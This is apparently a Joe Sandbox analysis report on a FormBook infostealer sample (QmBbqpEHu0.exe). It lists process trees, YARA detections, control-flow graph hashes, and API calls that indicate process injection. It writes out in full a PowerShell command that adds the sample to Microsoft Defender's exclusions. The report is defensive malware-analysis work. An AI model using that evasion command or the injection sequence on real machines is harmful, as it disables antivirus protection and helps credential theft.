                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Users\user\Desktop\QmBbqpEHu0.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\QmBbqpEHu0.exe"
                                                                                                                                    Imagebase:0x3a0000
                                                                                                                                    File size:916'992 bytes
                                                                                                                                    MD5 hash:EB7415C6ED5D31B69C535AFEED1AD3AC
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:3
                                                                                                                                    Start time:13:45:27
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe"
                                                                                                                                    Imagebase:0xd60000
                                                                                                                                    File size:433'152 bytes
                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:13:45:27
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Users\user\Desktop\QmBbqpEHu0.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\QmBbqpEHu0.exe"
                                                                                                                                    Imagebase:0x4a0000
                                                                                                                                    File size:916'992 bytes
                                                                                                                                    MD5 hash:EB7415C6ED5D31B69C535AFEED1AD3AC
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2286467492.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2286547549.0000000002840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:5
                                                                                                                                    Start time:13:45:27
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:8
                                                                                                                                    Start time:13:45:32
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                                                    File size:496'640 bytes
                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:9
                                                                                                                                    Start time:13:45:55
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe"
                                                                                                                                    Imagebase:0x970000
                                                                                                                                    File size:140'800 bytes
                                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3587562902.00000000045B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:10
                                                                                                                                    Start time:13:45:58
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Windows\SysWOW64\finger.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Windows\SysWOW64\finger.exe"
                                                                                                                                    Imagebase:0xfd0000
                                                                                                                                    File size:13'824 bytes
                                                                                                                                    MD5 hash:C586D06BF5D5B3E6E9E3289F6AA8225E
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3587418424.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3587551333.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:11
                                                                                                                                    Start time:13:46:13
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe"
                                                                                                                                    Imagebase:0x970000
                                                                                                                                    File size:140'800 bytes
                                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:13
                                                                                                                                    Start time:13:46:28
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                    Imagebase:0x7ff6bf500000
                                                                                                                                    File size:676'768 bytes
                                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true


                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:11%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:4.6%
                                                                                                                                      Total number of Nodes:174
                                                                                                                                      Total number of Limit Nodes:7
                                                                                                                                      execution_graph [interactive graph rendering omitted]: 174 nodes; root nodes 27ab1f8, 27a4668, 7470040, 747da10, 27ad560, 765ae1f, 747db18; APIs reached from the graph: GetModuleHandleW, CreateActCtxA, DrawTextExW, VirtualProtect, DuplicateHandle, CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread, PostMessageW

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph for 7478a10 [interactive graph rendering omitted; legend: Executed / Not Executed]: basic blocks 7478a10-7478f22, calls 74790d0
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ry$ry$ry
                                                                                                                                      • API String ID: 0-128149707
                                                                                                                                      • Opcode ID: f9c2bcc5cdd64fd22743a3d40fe9ceeddefdefa314a28f68d637dac767c64bc7
                                                                                                                                      • Instruction ID: 4a2478f2c1f372c8ad8694b63784106360f22f5e905cc366a9939d3bb7527285
                                                                                                                                      • Opcode Fuzzy Hash: f9c2bcc5cdd64fd22743a3d40fe9ceeddefdefa314a28f68d637dac767c64bc7
                                                                                                                                      • Instruction Fuzzy Hash: C0F19FB5D14206DFCB04CFA9C4894EEFBB6FF89310B10C96AD5159B241D734AA82CF90

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph for 7478aca [interactive graph rendering omitted; legend: Executed / Not Executed]: basic blocks 7478aca-7478f22, calls 74790d0
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ry$ry$ry
                                                                                                                                      • API String ID: 0-128149707
                                                                                                                                      • Opcode ID: 3d217ef0208421948784a066900a320a3d82491738fc97abd92d92735724fbfa
                                                                                                                                      • Instruction ID: 3d7bd9e9f815fd14e642d3279a13018c78748c783e1766a6adb173406d03238c
                                                                                                                                      • Opcode Fuzzy Hash: 3d217ef0208421948784a066900a320a3d82491738fc97abd92d92735724fbfa
                                                                                                                                      • Instruction Fuzzy Hash: 0FD17AB4D1420ADFCB04CFA9C4898EEFBB6FF89310B149956D411AB255C734AA82CF90

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph for 747654d [interactive graph rendering omitted; legend: Executed / Not Executed]: basic blocks 747654d-74768a2, call at 7476892 resolved to 7478967, 7477f7b, 7477caa or 7478918
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Tefq$Tefq$z^I
                                                                                                                                      • API String ID: 0-2708104242
                                                                                                                                      • Opcode ID: 99815b73960a585a63b8ba1f4b112dd8c0e50bfa06ce2b76ae4c461b67f0d67d
                                                                                                                                      • Instruction ID: e4464df1eabfc023f3b377d5715cd0f815b9a9d8f6c8b994386d86b69137fd78
                                                                                                                                      • Opcode Fuzzy Hash: 99815b73960a585a63b8ba1f4b112dd8c0e50bfa06ce2b76ae4c461b67f0d67d
                                                                                                                                      • Instruction Fuzzy Hash: E3B16AB5E146098FCB04CFAAD8806DEFBB2FF89310F24942AC415AB254D7349946CFA5

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph for 7478b28 [interactive graph rendering omitted; legend: Executed / Not Executed]: basic blocks 7478b28-7478f22, calls 74790d0
Strings
Memory Dump Source
• Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: ry$ry$ry
• API String ID: 0-128149707
• Opcode ID: 33525b77cb8871bc582f279233fb2e6e61fe4e09f59a6d9847bf1cbeede15931
• Instruction ID: a7aec6ea2332bfa0052a32dafd02329935dad35c2787951474af62eea6529cd8
• Opcode Fuzzy Hash: 33525b77cb8871bc582f279233fb2e6e61fe4e09f59a6d9847bf1cbeede15931
• Instruction Fuzzy Hash: 37C128B0D1420ADFCB04CFA9C5898EEFBB6FF89310B109856D515AB354D734AA82CF95

Control-flow Graph (figure; legend: Executed / Not Executed)
Strings
Memory Dump Source
• Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: Tefq$Tefq$z^I
• API String ID: 0-2708104242
• Opcode ID: f329d9b3fdcbe7a405f40d932560e0623658b9d531a48e98ecf4876f7fa9a5a5
• Instruction ID: 395bc3bce4eec3755233ebca4e75c6fcf65aa1a3f8ba3a71bd3bad1eb20b9742
• Opcode Fuzzy Hash: f329d9b3fdcbe7a405f40d932560e0623658b9d531a48e98ecf4876f7fa9a5a5
• Instruction Fuzzy Hash: C2A127B5E106098FCB04CFAAD8846DEFBB2FF89310F24942AD415BB254D7349946CFA5

Control-flow Graph (figure; legend: Executed / Not Executed)
Strings
Memory Dump Source
• Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: Tefq$Tefq$z^I
• API String ID: 0-2708104242
• Opcode ID: 4fdee71108ff392297b02518873d4efc0d919b6a2202ec5d51ae24ae7b364d47
• Instruction ID: cd434437fdd85dc0fd8df821121728c3497e82798a199d8ed57867d04f1260b7
• Opcode Fuzzy Hash: 4fdee71108ff392297b02518873d4efc0d919b6a2202ec5d51ae24ae7b364d47
• Instruction Fuzzy Hash: E491B2B4E116198FCB08CFAAC9846DEFBB2EF89310F24942AD415BB254D7349906CF65

Control-flow Graph (figure; legend: Executed / Not Executed)
Strings
Memory Dump Source
• Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: TuA$UC;"
• API String ID: 0-2071649361
• Opcode ID: 7103c76b0348af90baa686f63036e939b585315ab7bdef57a7cdeefbb89bcc7b
• Instruction ID: 07011ced9dc0e3d5489847f34e1e817218d0945aec7d9eb77f4884ba72f8da92
• Opcode Fuzzy Hash: 7103c76b0348af90baa686f63036e939b585315ab7bdef57a7cdeefbb89bcc7b
• Instruction Fuzzy Hash: AC9107B0D24609DFCF08CFA6E5819DEFBB6EF89350F10942AE415AB268D7309946CF50

Control-flow Graph (figure; legend: Executed / Not Executed)
Strings
Memory Dump Source
• Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: TuA$UC;"
• API String ID: 0-2071649361
• Opcode ID: 3a3ec3756b9dfe161efcdec3ff837aa3c1dab1ff959aa05d84e33abd0af143d4
• Instruction ID: e59f1ac09658304e2320e654438f76d6c7094d9d3f3a784c4d6f2fd41dbad74d
• Opcode Fuzzy Hash: 3a3ec3756b9dfe161efcdec3ff837aa3c1dab1ff959aa05d84e33abd0af143d4
• Instruction Fuzzy Hash: AB9129B1D24609EFCF08CFA5E5819DEFBB6EF89350F10942AE415AB268D7309946CF50
Strings
Memory Dump Source
• Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: `Yfl
• API String ID: 0-246209650
• Opcode ID: 173526b293685dcd8048361350dc4745b60a2b0f3cd94af7531a07e4076a781e
• Instruction ID: 347af53f415ff42ca270add5fe59554234e224ec0a50524ce9d2048f008e0785
• Opcode Fuzzy Hash: 173526b293685dcd8048361350dc4745b60a2b0f3cd94af7531a07e4076a781e
• Instruction Fuzzy Hash: B791B474E01209CFCB54DFA9C994A9EBBB2FF89300F1085A9D519AB369DB309D42CF40
Strings
Memory Dump Source
• Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: `Yfl
• API String ID: 0-246209650
• Opcode ID: 17e5822a4d30373db29289495826018ddb46cb4521f482baaf64c1bfdeb39c2a
• Instruction ID: 27542b8b67fbd57c2493cea3931251d59c674338368625001e8154dd909a9802
• Opcode Fuzzy Hash: 17e5822a4d30373db29289495826018ddb46cb4521f482baaf64c1bfdeb39c2a
• Instruction Fuzzy Hash: 6791A374E01219CFCB54DFA9C994A9EBBB2FF89300F108569D519AB369DB309D41CF40
Strings
Memory Dump Source
• Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: iUfo
• API String ID: 0-3820436262
• Opcode ID: 425ed3b39c38a31d270f333d96ada27f447a633ca52d125a71c67526f85918e1
• Instruction ID: 32d50140349b2d28a6ddb2a3660d6f4ee62388d76cca84508ae73843543cb09a
• Opcode Fuzzy Hash: 425ed3b39c38a31d270f333d96ada27f447a633ca52d125a71c67526f85918e1
• Instruction Fuzzy Hash: B07112B4E15229DFCB08CFA9D5455EEBBB2FB89300F10956AE405EB354EB349A42CB50
Strings
Memory Dump Source
• Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: 5=6
• API String ID: 0-2897083178
• Opcode ID: 64e7a25360e6f8202cbbca0896293d9c4fb99602d42e2ce96aeed47f1dae4c56
• Instruction ID: 27c19f73ec4932b76c07790d7d6decbaee217cf94192ac81300232cdd015ef1b
• Opcode Fuzzy Hash: 64e7a25360e6f8202cbbca0896293d9c4fb99602d42e2ce96aeed47f1dae4c56
• Instruction Fuzzy Hash: CB714AB4E2560A9FCB48CFA5D9414EEFBB2FF89301F10992AD419E7254DB349A02CF50
Strings
Memory Dump Source
• Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: 5=6
• API String ID: 0-2897083178
• Opcode ID: 46b19611c5daa232a16a0c7b8381f26d266d7a5e01409a965aeaf1544e0f4a93
• Instruction ID: 31f579dcf5f7d36d7e2c5b98e45b38aa36ff3b122e590d2c730d4dc37dc52015
• Opcode Fuzzy Hash: 46b19611c5daa232a16a0c7b8381f26d266d7a5e01409a965aeaf1544e0f4a93
• Instruction Fuzzy Hash: 98614974E2561A9FCB08CFA5D9414EEFBB6FF89300F10992AD41AE7214DB349A02CF54
Strings
Memory Dump Source
• Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: iUfo
• API String ID: 0-3820436262
• Opcode ID: b18041b053ed6c05d4998eb53dcfc27ea2a6f9e36df3e5409736c86906511cd9
• Instruction ID: 6ba167d12563f6b4561976d37762c55e5bcd7437f8da706f2ea4d07c0296377d
• Opcode Fuzzy Hash: b18041b053ed6c05d4998eb53dcfc27ea2a6f9e36df3e5409736c86906511cd9
• Instruction Fuzzy Hash: E45112B4E14229DFCB14CFAAD9455EEBBB2FB89300F10856AE405BB214EB345A42CF50
Memory Dump Source
• Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: af4f198b6839ac0d76778bd4b175c5ea8cd012d112496b28a7a9e75ec7fa24d6
                                                                                                                                      • Instruction ID: 293f33f669a855319466c978fb186d58cfadc3868362987564f122c107e58879
                                                                                                                                      • Opcode Fuzzy Hash: af4f198b6839ac0d76778bd4b175c5ea8cd012d112496b28a7a9e75ec7fa24d6
                                                                                                                                      • Instruction Fuzzy Hash: 41229CB0B012059FDB19DB79C4A4BAEB7F6AF89700F144469E506DB3A0CB35EE01DB51
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: aa03b891539b372e8a3491ae4b374e1a2e3df636d5e198ee89957dd0bfb4f071
                                                                                                                                      • Instruction ID: 63a3a0f066fa40789255293e1a8aee5a37bc2083cab64d973d271c6b55257aec
                                                                                                                                      • Opcode Fuzzy Hash: aa03b891539b372e8a3491ae4b374e1a2e3df636d5e198ee89957dd0bfb4f071
                                                                                                                                      • Instruction Fuzzy Hash: 17312AB1E006488BDB18CFABD9446DEFBB7AFC9310F14C06AD409AA264DB355945CF51

                                                                                                                                       Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed; basic blocks 0765a775 through 0765aac5, with the CreateProcessA call site in block 0765a90f-0765a9c9)
                                                                                                                                      APIs
                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0765A9B6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                      • Opcode ID: 18e547c7493a888ab18cfe249c33dfd18fe902144ad7e29c776397e5153b516d
                                                                                                                                      • Instruction ID: 4e22d97091e2870570fc8b7b8eee341752ac51dc7b65621b4f8ee2f96257ec5d
                                                                                                                                      • Opcode Fuzzy Hash: 18e547c7493a888ab18cfe249c33dfd18fe902144ad7e29c776397e5153b516d
                                                                                                                                      • Instruction Fuzzy Hash: BA913AB1D0021ADFDB24CFA8CD41BDEBBB2BF48314F148669E849A7240DB749985DF91
                                                                                                                                      APIs
                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0765A9B6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                      • Opcode ID: 8c76ea64375887c1ba3030cb9de2d5b9ad0b3398c164303ac3797efeba5d3680
                                                                                                                                      • Instruction ID: fdcbce2dfa55915eb4f400332adf998dc258d640ff588387e919c2fd5c05ebc2
                                                                                                                                      • Opcode Fuzzy Hash: 8c76ea64375887c1ba3030cb9de2d5b9ad0b3398c164303ac3797efeba5d3680
                                                                                                                                      • Instruction Fuzzy Hash: 7C913BB1D0021ADFDB24CFA8CD41BDEBBB2BF48310F148669E849A7240DB749985DF91
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5cc36d4bd70b614349a68e6a0dfeb05ad854cd4656ddc53cdeaebf3e94139ba8
                                                                                                                                      • Instruction ID: 7e7983ec1612632855a0ec2b8a0a2f7247440c99c5f479fdb9370260b15e75cb
                                                                                                                                      • Opcode Fuzzy Hash: 5cc36d4bd70b614349a68e6a0dfeb05ad854cd4656ddc53cdeaebf3e94139ba8
                                                                                                                                      • Instruction Fuzzy Hash: 488166B0A00B048FD764DF69D45475ABBF1FF98318F009A2DD08AD7A50D775E805CB91
                                                                                                                                      APIs
                                                                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 074700D7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DrawText
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2175133113-0
                                                                                                                                      • Opcode ID: 0df17002e680e7f4de2833d84f4a6f954eadfaf0b01b9dfd1d28e21a572f9d0e
                                                                                                                                      • Instruction ID: e590b708508ec52b7f1a11e50deb4a8a141f345b565833705e8ef1a502f2d291
                                                                                                                                      • Opcode Fuzzy Hash: 0df17002e680e7f4de2833d84f4a6f954eadfaf0b01b9dfd1d28e21a572f9d0e
                                                                                                                                      • Instruction Fuzzy Hash: 913146B29053899FCB11CFAAD8806DEBFF4EF49320F14846AE454E7221C375A945CBA1
                                                                                                                                      APIs
                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 027A59C9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                      • Opcode ID: 0e94b4d4ce7f4da566c64e7027a452244b49f324895a31d3fd16c2bb5a40e232
                                                                                                                                      • Instruction ID: 5768fd20c1a7728235ab46eb58392b864311ef40611b194768af52013cf1e838
                                                                                                                                      • Opcode Fuzzy Hash: 0e94b4d4ce7f4da566c64e7027a452244b49f324895a31d3fd16c2bb5a40e232
                                                                                                                                      • Instruction Fuzzy Hash: 604101B0D00718CBDB24CFA9C884BCEBBF6BF88314F60816AD409AB255DB756945CF90
                                                                                                                                      APIs
                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 027A59C9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                      • Opcode ID: 0fbd4ec781777269a011da0575ad85a78ad600a28ad050aaa49f792054d4516c
                                                                                                                                      • Instruction ID: e00ac4abfbea1e1b259063d23126da020407ae3b060798824a59380333ddac46
                                                                                                                                      • Opcode Fuzzy Hash: 0fbd4ec781777269a011da0575ad85a78ad600a28ad050aaa49f792054d4516c
                                                                                                                                      • Instruction Fuzzy Hash: DA4101B0D00718CBDB24CFA9C884BCEBBF6BF88314F60816AD409AB255DB716945CF90
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
